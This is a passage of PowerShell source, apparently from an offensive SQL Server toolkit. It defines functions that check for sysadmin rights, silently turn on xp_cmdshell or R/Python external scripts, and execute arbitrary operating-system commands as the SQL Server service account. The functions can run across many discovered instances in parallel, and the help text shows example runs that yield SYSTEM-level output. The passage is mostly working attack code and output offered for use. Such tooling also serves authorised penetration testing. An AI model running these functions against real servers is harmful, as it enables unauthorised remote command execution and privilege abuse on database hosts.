SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER TimeOut Connection time out. .PARAMETER SuppressVerbose Suppress verbose errors. Used when function is wrapped. .PARAMETER Threads Number of concurrent threads. .PARAMETER Command Operating command to be executed on the SQL Server. .PARAMETER RawResults Just show the raw results without the computer or instance name. .EXAMPLE PS C:\> Invoke-SQLOSCmd -Verbose -Instance "SQLServer1" -Command "dir c:\windows\system32\drivers\etc\" -RawResults VERBOSE: Creating runspace pool and session states VERBOSE: SQLServer1 : Connection Success. VERBOSE: SQLServer1 : Connection Success. VERBOSE: SQLServer1 : You are a sysadmin. VERBOSE: SQLServer1 : Show Advanced Options is disabled. VERBOSE: SQLServer1 : Enabled Show Advanced Options. VERBOSE: SQLServer1 : xp_cmdshell is disabled. VERBOSE: SQLServer1 : Enabled xp_cmdshell. VERBOSE: SQLServer1 : Running command: dir c:\windows\system32\drivers\etc\ VERBOSE: SQLServer1 : Disabling xp_cmdshell VERBOSE: SQLServer1 : Disabling Show Advanced Options Volume in drive C is OSDisk Volume Serial Number is C044-F8BC VERBOSE: Closing the runspace pool output ------ Directory of c:\windows\system32\drivers\etc 06/22/2016 09:09 AM . 06/22/2016 09:09 AM .. 09/22/2015 10:16 AM 851 hosts 08/22/2013 10:35 AM 3,683 lmhosts.sam 08/22/2013 08:25 AM 407 networks 08/22/2013 08:25 AM 1,358 protocol 08/22/2013 08:25 AM 17,463 services 5 File(s) 23,762 bytes 2 Dir(s) 56,438,497,280 bytes free .EXAMPLE PS C:\> Invoke-SQLOSCmd -Verbose -Instance "SQLSERVER1.domain.com,1433" -Command "whoami" Invoke-SQLOSCmd -Verbose -Instance "SQLServer1" -Command "whoami" VERBOSE: Creating runspace pool and session states VERBOSE: SQLServer1 : Connection Success. VERBOSE: SQLServer1 : Connection Success. VERBOSE: SQLServer1 : You are a sysadmin. VERBOSE: SQLServer1 : Show Advanced Options is disabled. VERBOSE: SQLServer1 : Enabled Show Advanced Options. VERBOSE: SQLServer1 : xp_cmdshell is disabled. VERBOSE: SQLServer1 : Enabled xp_cmdshell. VERBOSE: SQLServer1 : Running command: whoami VERBOSE: SQLServer1 : Disabling xp_cmdshell VERBOSE: SQLServer1 : Disabling Show Advanced Options VERBOSE: Closing the runspace pool ComputerName Instance CommandResults ------------ -------- -------------- SQLServer1 SQLServer1 nt service\mssqlserver .EXAMPLE PS C:\> Get-SQLInstanceDomain | Invoke-SQLOSCmd -Verbose -Command "whoami" -Threads 5 Get-SQLInstanceLocal | Invoke-SQLOSCmd -Verbose -Command "whoami" VERBOSE: Creating runspace pool and session states VERBOSE: SQLServer1\SQLEXPRESS : Connection Success. VERBOSE: SQLServer1\SQLEXPRESS : Connection Success. VERBOSE: SQLServer1\SQLEXPRESS : You are a sysadmin. VERBOSE: SQLServer1\SQLEXPRESS : Show Advanced Options is already enabled. VERBOSE: SQLServer1\SQLEXPRESS : xp_cmdshell is already enabled. VERBOSE: SQLServer1\SQLEXPRESS : Running command: whoami VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success. VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success. VERBOSE: SQLServer1\STANDARDDEV2014 : You are a sysadmin. VERBOSE: SQLServer1\STANDARDDEV2014 : Show Advanced Options is already enabled. VERBOSE: SQLServer1\STANDARDDEV2014 : xp_cmdshell is already enabled. VERBOSE: SQLServer1\STANDARDDEV2014 : Running command: whoami VERBOSE: SQLServer1 : Connection Success. VERBOSE: SQLServer1 : Connection Success. VERBOSE: SQLServer1 : You are a sysadmin. VERBOSE: SQLServer1 : Show Advanced Options is disabled. VERBOSE: SQLServer1 : Enabled Show Advanced Options. VERBOSE: SQLServer1 : xp_cmdshell is disabled. VERBOSE: SQLServer1 : Enabled xp_cmdshell. VERBOSE: SQLServer1 : Running command: whoami VERBOSE: SQLServer1 : Disabling xp_cmdshell VERBOSE: SQLServer1 : Disabling Show Advanced Options VERBOSE: Closing the runspace pool ComputerName Instance CommandResults ------------ -------- -------------- SQLServer1 SQLServer1\SQLEXPRESS nt service\mssql$sqlexpress SQLServer1 SQLServer1\STANDARDDEV2014 nt authority\system SQLServer1 SQLServer1 nt service\mssqlserver #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Connect using Dedicated Admin Connection.')] [Switch]$DAC, [Parameter(Mandatory = $true, HelpMessage = 'OS command to be executed.')] [String]$Command, [Parameter(Mandatory = $false, HelpMessage = 'Connection timeout.')] [string]$TimeOut, [Parameter(Mandatory = $false, HelpMessage = 'Number of threads.')] [int]$Threads = 1, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose, [Parameter(Mandatory = $false, HelpMessage = 'Just show the raw results without the computer or instance name.')] [switch]$RawResults ) Begin { # Setup data table for output $TblCommands = New-Object -TypeName System.Data.DataTable $TblResults = New-Object -TypeName System.Data.DataTable $null = $TblResults.Columns.Add('ComputerName') $null = $TblResults.Columns.Add('Instance') $null = $TblResults.Columns.Add('CommandResults') # Setup data table for pipeline threading $PipelineItems = New-Object -TypeName System.Data.DataTable # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Ensure provided instance is processed if($Instance) { $ProvideInstance = New-Object -TypeName PSObject -Property @{ Instance = $Instance } } # Add instance to instance list $PipelineItems = $PipelineItems + $ProvideInstance } Process { # Create list of pipeline items $PipelineItems = $PipelineItems + $_ } End { # Define code to be multi-threaded $MyScriptBlock = { $Instance = $_.Instance # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Setup DAC string if($DAC) { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut } else { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut } # Attempt connection try { # Open connection $Connection.Open() if(-not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } # Switch to track xp_cmdshell status $DisableShowAdvancedOptions = 0 $DisableXpCmdshell = 0 # Get sysadmin status $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin # Check if xp_cmdshell is enabled if($IsSysadmin -eq 'Yes') { Write-Verbose -Message "$Instance : You are a sysadmin." $IsXpCmdshellEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'xp_cmdshell'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value $IsShowAdvancedEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value } else { Write-Verbose -Message "$Instance : You are not a sysadmin. This command requires sysadmin privileges." # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'No sysadmin privileges.') return } # Enable show advanced options if needed if ($IsShowAdvancedEnabled -eq 1) { Write-Verbose -Message "$Instance : Show Advanced Options is already enabled." } else { Write-Verbose -Message "$Instance : Show Advanced Options is disabled." $DisableShowAdvancedOptions = 1 # Try to enable Show Advanced Options Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Check if configuration change worked $IsShowAdvancedEnabled2 = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value if ($IsShowAdvancedEnabled2 -eq 1) { Write-Verbose -Message "$Instance : Enabled Show Advanced Options." } else { Write-Verbose -Message "$Instance : Enabling Show Advanced Options failed. Aborting." # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable Show Advanced Options.') return } } # Enable xp_cmdshell if needed if ($IsXpCmdshellEnabled -eq 1) { Write-Verbose -Message "$Instance : xp_cmdshell is already enabled." } else { Write-Verbose -Message "$Instance : xp_cmdshell is disabled." $DisableXpCmdshell = 1 # Try to enable xp_cmdshell Get-SQLQuery -Instance $Instance -Query "sp_configure 'xp_cmdshell',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Check if configuration change worked $IsXpCmdshellEnabled2 = Get-SQLQuery -Instance $Instance -Query 'sp_configure xp_cmdshell' -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value if ($IsXpCmdshellEnabled2 -eq 1) { Write-Verbose -Message "$Instance : Enabled xp_cmdshell." } else { Write-Verbose -Message "$Instance : Enabling xp_cmdshell failed. Aborting." # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable xp_cmdshell.') return } } # Setup OS command Write-Verbose -Message "$Instance : Running command: $Command" #$Query = "EXEC master..xp_cmdshell '$Command' WITH RESULT SETS ((output VARCHAR(MAX)))" $Query = "EXEC master..xp_cmdshell '$Command'" # Execute OS command $CmdResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property output -ExpandProperty output # Display results or add to final results table if($RawResults) { $CmdResults | Select output -ExpandProperty output } else { $null = $TblResults.Rows.Add($ComputerName, $Instance, [string]$CmdResults) } # Restore xp_cmdshell state if needed if($DisableXpCmdshell -eq 1) { Write-Verbose -Message "$Instance : Disabling xp_cmdshell" Get-SQLQuery -Instance $Instance -Query "sp_configure 'xp_cmdshell',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose } # Restore Show Advanced Options state if needed if($DisableShowAdvancedOptions -eq 1) { Write-Verbose -Message "$Instance : Disabling Show Advanced Options" Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose } # Close connection $Connection.Close() # Dispose connection $Connection.Dispose() } catch { # Connection failed if(-not $SuppressVerbose) { $ErrorMessage = $_.Exception.Message Write-Verbose -Message "$Instance : Connection Failed." #Write-Verbose " Error: $ErrorMessage" } # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Not Accessible') } } # Run scriptblock using multi-threading $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue return $TblResults } } # ---------------------------------- # Invoke-SQLOSCmdR # ---------------------------------- # Author: Scott Sutherland # Reference: https://pastebin.com/raw/zBDnzELT Function Invoke-SQLOSCmdR { <# .SYNOPSIS Execute command on the operating system as the SQL Server service account using the R runtime language. Supports threading, raw output, and table output. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER TimeOut Connection time out. .PARAMETER SuppressVerbose Suppress verbose errors. Used when function is wrapped. .PARAMETER Threads Number of concurrent threads. .PARAMETER Command Operating command to be executed on the SQL Server. .PARAMETER RawResults Just show the raw results without the computer or instance name. .EXAMPLE PS C:\> Get-SQLInstanceLocal | Invoke-SQLOSCmdR -Verbose -Command "whoami" VERBOSE: Creating runspace pool and session states VERBOSE: MSSQLSRV04 : Connection Failed. VERBOSE: MSSQLSRV04\BOSCHSQL : Connection Success. VERBOSE: MSSQLSRV04\BOSCHSQL : You are not a sysadmin. This command requires sysadmin privileges. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Connection Success. VERBOSE: MSSQLSRV04\SQLSERVER2014 : You are a sysadmin. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Show Advanced Options is already enabled. VERBOSE: MSSQLSRV04\SQLSERVER2014 : external scripts are already enabled. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Running command: whoami VERBOSE: MSSQLSRV04\SQLSERVER2016 : Connection Failed. VERBOSE: Closing the runspace pool ComputerName Instance CommandResults ------------ -------- -------------- MSSQLSRV04 MSSQLSRV04\BOSCHSQL No sysadmin privileges. MSSQLSRV04 MSSQLSRV04\SQLSERVER2014 nt authority\system MSSQLSRV04 MSSQLSRV04\SQLSERVER2016 Not Accessible .EXAMPLE PS C:\> Invoke-SQLOSCmdR -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Command "whoami" -RawResults VERBOSE: Creating runspace pool and session states VERBOSE: MSSQLSRV04\SQLSERVER2014 : Connection Success. VERBOSE: MSSQLSRV04\SQLSERVER2014 : You are a sysadmin. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Show Advanced Options is disabled. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Enabled Show Advanced Options. VERBOSE: MSSQLSRV04\SQLSERVER2014 : External scripts are disabled. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Enabled external scripts. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Executing command: whoami VERBOSE: MSSQLSRV04\SQLSERVER2014 : Disabling external scripts VERBOSE: MSSQLSRV04\SQLSERVER2014 : Disabling Show Advanced Options nt authority\system VERBOSE: Closing the runspace pool #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Connect using Dedicated Admin Connection.')] [Switch]$DAC, [Parameter(Mandatory = $true, HelpMessage = 'OS command to be executed.')] [String]$Command = "whoami", [Parameter(Mandatory = $false, HelpMessage = 'Connection timeout.')] [string]$TimeOut, [Parameter(Mandatory = $false, HelpMessage = 'Number of threads.')] [int]$Threads = 1, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose, [Parameter(Mandatory = $false, HelpMessage = 'Just show the raw results without the computer or instance name.')] [switch]$RawResults ) Begin { # Setup data table for output $TblCommands = New-Object -TypeName System.Data.DataTable $TblResults = New-Object -TypeName System.Data.DataTable $null = $TblResults.Columns.Add('ComputerName') $null = $TblResults.Columns.Add('Instance') $null = $TblResults.Columns.Add('CommandResults') # Setup data table for pipeline threading $PipelineItems = New-Object -TypeName System.Data.DataTable # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Ensure provided instance is processed if($Instance) { $ProvideInstance = New-Object -TypeName PSObject -Property @{ Instance = $Instance } } # Add instance to instance list $PipelineItems = $PipelineItems + $ProvideInstance } Process { # Create list of pipeline items $PipelineItems = $PipelineItems + $_ } End { # Define code to be multi-threaded $MyScriptBlock = { $Instance = $_.Instance # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Setup DAC string if($DAC) { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut } else { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut } # Attempt connection try { # Open connection $Connection.Open() if(-not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } # Switch to track external scripting status $DisableShowAdvancedOptions = 0 $DisableExternalScripts = 0 # Check version, 2016 or later # Get sysadmin status $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin # Check if external scripting is enabled if($IsSysadmin -eq 'Yes') { Write-Verbose -Message "$Instance : You are a sysadmin." $IsExternalScriptsEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'external scripts enabled'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value $IsShowAdvancedEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value } else { Write-Verbose -Message "$Instance : You are not a sysadmin. This command requires sysadmin privileges." # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'No sysadmin privileges.') return } # Enable show advanced options if needed if ($IsShowAdvancedEnabled -eq 1) { Write-Verbose -Message "$Instance : Show Advanced Options is already enabled." } else { Write-Verbose -Message "$Instance : Show Advanced Options is disabled." $DisableShowAdvancedOptions = 1 # Try to enable Show Advanced Options Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Check if configuration change worked $IsShowAdvancedEnabled2 = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value if ($IsShowAdvancedEnabled2 -eq 1) { Write-Verbose -Message "$Instance : Enabled Show Advanced Options." } else { Write-Verbose -Message "$Instance : Enabling Show Advanced Options failed. Aborting." # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable Show Advanced Options.') return } } # Enable external scripts if needed if ($IsExternalScriptsEnabled -eq 1) { Write-Verbose -Message "$Instance : External scripts are already enabled." } else { Write-Verbose -Message "$Instance : External scripts enabled are disabled." $DisableExternalScripts = 1 # Try to enable Ole Automation Procedures Get-SQLQuery -Instance $Instance -Query "sp_configure 'external scripts enabled',1;RECONFIGURE WITH OVERRIDE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Check if configuration change worked $IsExternalScriptsEnabled2 = Get-SQLQuery -Instance $Instance -Query 'sp_configure "external scripts enabled"' -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value if ($IsExternalScriptsEnabled2 -eq 1) { Write-Verbose -Message "$Instance : Enabled external scripts." } else { Write-Verbose -Message "$Instance : Enabling external scripts failed. Aborting." # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable external scripts.') return } } # Check if the configuration has been change in the run state $EnabledInRunValue = Get-SQLQuery -Instance $Instance -Query "SELECT value_in_use FROM master.sys.configurations WHERE name LIKE 'external scripts enabled'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -ExpandProperty value_in_use if($EnabledInRunValue -eq 0){ Write-Verbose -Message "$Instance : The 'external scripts enabled' setting is not enabled in runtime." Write-Verbose -Message "$Instance : - The SQL Server service will need to be manually restarted for the change to take effect." Write-Verbose -Message "$Instance : - Not recommended unless you're the DBA." $null = $TblResults.Rows.Add("$ComputerName","$Instance",'External scripts not enabled in runtime.') return }else{ Write-Verbose -Message "$Instance : The 'external scripts enabled' setting is enabled in runtime.'" } # Setup query to run command write-verbose "$instance : Executing command: $Command" $QueryCmdExecute = @" EXEC sp_execute_external_script @language=N'R', @script=N'OutputDataSet <- data.frame(shell("$Command",intern=T))' WITH RESULT SETS (([Output] varchar(max))); "@ # Execute query $CmdResults = Get-SQLQuery -Instance $Instance -Query $QueryCmdExecute -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | select Output -ExpandProperty Output # Display results or add to final results table if($RawResults) { $CmdResults } else { $null = $TblResults.Rows.Add($ComputerName, $Instance, [string]$CmdResults.trim()) } # Restore external scripts state if needed if($DisableExternalScripts -eq 1) { Write-Verbose -Message "$Instance : Disabling external scripts" Get-SQLQuery -Instance $Instance -Query "sp_configure 'external scripts enabled',0;RECONFIGURE WITH OVERRIDE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose } # Restore Show Advanced Options state if needed if($DisableShowAdvancedOptions -eq 1) { Write-Verbose -Message "$Instance : Disabling Show Advanced Options" Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose } # Close connection $Connection.Close() # Dispose connection $Connection.Dispose() } catch { # Connection failed if(-not $SuppressVerbose) { $ErrorMessage = $_.Exception.Message Write-Verbose -Message "$Instance : Connection Failed." #Write-Verbose " Error: $ErrorMessage" } # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Not Accessible or Command Failed') } } # Run scriptblock using multi-threading $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue return $TblResults } } # ---------------------------------- # Invoke-SQLOSCmdPython # ---------------------------------- # Author: Scott Sutherland # Reference: https://gist.github.com/james-otten/63389189ee73376268c5eb676946ada5 Function Invoke-SQLOSCmdPython { <# .SYNOPSIS Execute command on the operating system as the SQL Server service account using the Python runtime language. Supports threading, raw output, and table output. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER TimeOut Connection time out. .PARAMETER SuppressVerbose Suppress verbose errors. Used when function is wrapped. .PARAMETER Threads Number of concurrent threads. .PARAMETER Command Operating command to be executed on the SQL Server. .PARAMETER RawResults Just show the raw results without the computer or instance name. .EXAMPLE PS C:\> Get-SQLInstanceLocal | Invoke-SQLOSCmdPython -Verbose -Command "whoami" VERBOSE: Creating runspace pool and session states VERBOSE: MSSQLSRV04 : Connection Failed. VERBOSE: MSSQLSRV04\BOSCHSQL : Connection Success. VERBOSE: MSSQLSRV04\BOSCHSQL : You are not a sysadmin. This command requires sysadmin privileges. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Connection Success. VERBOSE: MSSQLSRV04\SQLSERVER2014 : You are a sysadmin. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Show Advanced Options is already enabled. VERBOSE: MSSQLSRV04\SQLSERVER2014 : external scripts are already enabled. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Running command: whoami VERBOSE: MSSQLSRV04\SQLSERVER2016 : Connection Failed. VERBOSE: Closing the runspace pool ComputerName Instance CommandResults ------------ -------- -------------- MSSQLSRV04 MSSQLSRV04\BOSCHSQL No sysadmin privileges. MSSQLSRV04 MSSQLSRV04\SQLSERVER2014 nt authority\system MSSQLSRV04 MSSQLSRV04\SQLSERVER2016 Not Accessible .EXAMPLE PS C:\> Invoke-SQLOSCmdPython -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Command "whoami" -RawResults VERBOSE: Creating runspace pool and session states VERBOSE: MSSQLSRV04\SQLSERVER2014 : Connection Success. VERBOSE: MSSQLSRV04\SQLSERVER2014 : You are a sysadmin. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Show Advanced Options is disabled. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Enabled Show Advanced Options. VERBOSE: MSSQLSRV04\SQLSERVER2014 : External scripts are disabled. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Enabled external scripts. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Executing command: whoami VERBOSE: MSSQLSRV04\SQLSERVER2014 : Disabling external scripts VERBOSE: MSSQLSRV04\SQLSERVER2014 : Disabling Show Advanced Options nt authority\system VERBOSE: Closing the runspace pool #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Connect using Dedicated Admin Connection.')] [Switch]$DAC, [Parameter(Mandatory = $true, HelpMessage = 'OS command to be executed.')] [String]$Command = "whoami", [Parameter(Mandatory = $false, HelpMessage = 'Connection timeout.')] [string]$TimeOut, [Parameter(Mandatory = $false, HelpMessage = 'Number of threads.')] [int]$Threads = 1, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose, [Parameter(Mandatory = $false, HelpMessage = 'Just show the raw results without the computer or instance name.')] [switch]$RawResults ) Begin { # Setup data table for output $TblCommands = New-Object -TypeName System.Data.DataTable $TblResults = New-Object -TypeName System.Data.DataTable $null = $TblResults.Columns.Add('ComputerName') $null = $TblResults.Columns.Add('Instance') $null = $TblResults.Columns.Add('CommandResults') # Setup data table for pipeline threading $PipelineItems = New-Object -TypeName System.Data.DataTable # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Ensure provided instance is processed if($Instance) { $ProvideInstance = New-Object -TypeName PSObject -Property @{ Instance = $Instance } } # Add instance to instance list $PipelineItems = $PipelineItems + $ProvideInstance } Process { # Create list of pipeline items $PipelineItems = $PipelineItems + $_ } End { # Define code to be multi-threaded $MyScriptBlock = { $Instance = $_.Instance # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Setup DAC string if($DAC) { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut } else { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut } # Attempt connection try { # Open connection $Connection.Open() if(-not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } # Switch to track external scripting status $DisableShowAdvancedOptions = 0 $DisableExternalScripts = 0 # Check version, 2016 or later # Get sysadmin status $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin # Check if external scripting is enabled if($IsSysadmin -eq 'Yes') { Write-Verbose -Message "$Instance : You are a sysadmin." $IsExternalScriptsEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'external scripts enabled'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value $IsShowAdvancedEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value } else { Write-Verbose -Message "$Instance : You are not a sysadmin. This command requires sysadmin privileges." # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'No sysadmin privileges.') return } # Enable show advanced options if needed if ($IsShowAdvancedEnabled -eq 1) { Write-Verbose -Message "$Instance : Show Advanced Options is already enabled." } else { Write-Verbose -Message "$Instance : Show Advanced Options is disabled." $DisableShowAdvancedOptions = 1 # Try to enable Show Advanced Options Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Check if configuration change worked $IsShowAdvancedEnabled2 = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value if ($IsShowAdvancedEnabled2 -eq 1) { Write-Verbose -Message "$Instance : Enabled Show Advanced Options." } else { Write-Verbose -Message "$Instance : Enabling Show Advanced Options failed. Aborting." # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable Show Advanced Options.') return } } # Enable external scripts if needed if ($IsExternalScriptsEnabled -eq 1) { Write-Verbose -Message "$Instance : External scripts are already enabled." } else { Write-Verbose -Message "$Instance : External scripts enabled are disabled." $DisableExternalScripts = 1 # Try to enable Ole Automation Procedures Get-SQLQuery -Instance $Instance -Query "sp_configure 'external scripts enabled',1;RECONFIGURE WITH OVERRIDE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Check if configuration change worked $IsExternalScriptsEnabled2 = Get-SQLQuery -Instance $Instance -Query 'sp_configure "external scripts enabled"' -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value if ($IsExternalScriptsEnabled2 -eq 1) { Write-Verbose -Message "$Instance : Enabled external scripts." } else { Write-Verbose -Message "$Instance : Enabling external scripts failed. Aborting." # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable external scripts.') return } } # Check if the configuration has been change in the run state $EnabledInRunValue = Get-SQLQuery -Instance $Instance -Query "SELECT value_in_use FROM master.sys.configurations WHERE name LIKE 'external scripts enabled'" -Username 